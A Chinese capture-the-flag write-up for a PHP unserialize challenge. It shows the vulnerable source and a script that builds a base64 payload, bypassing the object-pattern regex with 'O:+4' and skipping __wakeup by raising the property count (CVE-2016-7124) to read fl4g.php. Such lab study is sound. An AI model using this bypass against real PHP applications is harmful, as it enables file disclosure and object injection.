攻防世界Web_php_unserialize
原始碼:
1 <?php 2 class Demo { 3 private $file = 'index.php'; 4 public function __construct($file) { 5 $this->file = $file; 6 } 7 function __destruct() { 8 echo @highlight_file($this->file, true); 9 } 10 function __wakeup() { 11 if($this->file != 'index.php') { 12 //the secret is in the fl4g.php 13 $this->file = 'index.php'; 14 } 15 } 16 } 17 if (isset($_GET['var'])) { 18 $var = base64_decode($_GET['var']); 19 if (preg_match('/[oc]:\d+:/i', $var)) { 20 die('stop hacking!');21 } else { 22 @unserialize($var); 23 } 24 } else { 25 highlight_file("index.php"); 26 } 27 ?>
<?php class Demo { private $file ='fl4g.php'; } $s = new Demo(); $a=serialize($s); $a= str_replace('O:4', 'O:+4',$a);//繞過preg_match //O:+4:"Demo":1:{s:10:"Demofile";s:8:"flag.php";} $a= str_replace(':1:', ':2:',$a);//繞過wakeup $a=base64_encode($a); print_r($a);//TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ== ?>
用+4替換成4是為了繞過preg_match的正則表示式
preg_match('/[oc]:\d+:/i', $var) //[oc] 表示正則表示式,d+代表任意數字
preg_match用法:
查詢文字字串"php": <?php //模式分隔符後的"i"標記這是一個大小寫不敏感的搜尋 if (preg_match("/php/i", "PHP is the web scripting language of choice.")) { echo "查詢到匹配的字串 php。"; } else { echo "未發現匹配的字串 php。"; } ?>
同樣的把2替換成1是利用了CVE-2016-7124的漏洞,即當序列化字串中表示物件屬性個數的值大於真實的屬性個數時會跳過__wakeup的執行
最後按照題目的意思encode一下base64就獲取反序列化的結果,get傳參即可
參考:https://www.cnblogs.com/gaonuoqi/p/11896281.html
<?phpclass Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wakeup() { if ($this->file != 'index.php') { //the secret is in the fl4g.php $this->file = 'index.php'; } }} $A = new Demo('fl4g.php'); $b = serialize($A); //string(49) "O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}" $b = str_replace('O:4', 'O:+4',$b);//繞過preg_match $b = str_replace(':1:', ':2:',$b);//繞過wakeup //string(49) "O:+4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.php";}" echo (base64_encode($b)); //TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==?>